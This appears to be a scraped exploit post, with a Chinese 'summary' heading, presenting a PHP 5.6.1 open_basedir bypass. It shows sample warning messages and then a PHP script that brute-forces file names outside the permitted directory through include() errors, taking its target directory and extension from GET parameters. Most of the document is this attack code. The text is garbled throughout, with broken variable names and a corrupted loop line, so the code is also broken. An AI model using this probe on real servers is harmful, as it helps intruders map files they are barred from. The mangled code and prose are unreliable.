PHP 5.6.1 open_basedir exist file check bypass

摘要

- file an existing member:
Warning: include (): open_basedir restriction in effect. File (D: / site / file.txt) is not within the allowed path (s):
(d: / site / www /) .....

- file an existing member:
Warning: include (): open_basedir restriction in effect. File (D: / site / file.txt) is not within the allowed path (s):
(d: / site / www /) .....

- file is missing:
Warning: include (): open_basedir restriction in effect. File (../ file1.txt) is not within the allowed path (s): (d: /
site / www /) .....

[php]
ini_set ('display_errors', 1);
ini_set ('display_startup_errors', 1);
ini_set ('error_reporting', E_ALL);
ini_set ('log_errors', 0);
ini_set ('html_errors', 0);
ini_set ('max_execution_time', 0);

$ Alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789-_.';
$ Alphabet_len = strlen ($ alphabet);
$ Maxlength = 1;
$ Str = '';

$ Dir = '../';
if (isset ($ _ GET ['dir'])) {
$ Dir = $ _GET ['dir'];
}

$ Ext = '';
if (isset ($ _ GET ['ext'])) {
$ Ext = $ _GET ['ext'];
if (isset ($ ext [0]) && $ ext [0]! = '.') {
$ Ext = '.'. $ Ext;
}
}

function inc ($ s, $ i) {
global $ alphabet_len;
if (! isset ($ s [$ i])) {
$ S [$ i] = 0;
return $ s;
}
if ($ s [$ i] + 1 == $ alphabet_len) {
$ S [$ i] = 0;
$ S = inc ($ s, $ i + 1);
} Else {
$ S [$ i] ++;
}
return $ s;
}

function check3 ($ s) {
global $ str, $ alphabet, $ dir, $ ext;
$ Str = 'a';
for ($ i = 0; $ i $ Str [$ i] = $ alphabet [$ s [$ i]];
}
include $ dir. '/. /'. $ str. $ ext;
}

function eh ($ errno, $ errstr, $ errfile, $ errline) {
global $ str, $ ext;
if (substr_count ($ errstr, '/./') == 0) {
echo $ str. $ ext. '
';
}
}

set_error_handler ("eh");
echo 'open_basedir =' .ini_get ('open_basedir'). '
';

$ S = array ();
while (count ($ s = inc ($ s, 0)) <= $ maxlength) {
check3 ($ s);
}

echo '
end';

?>
[/php]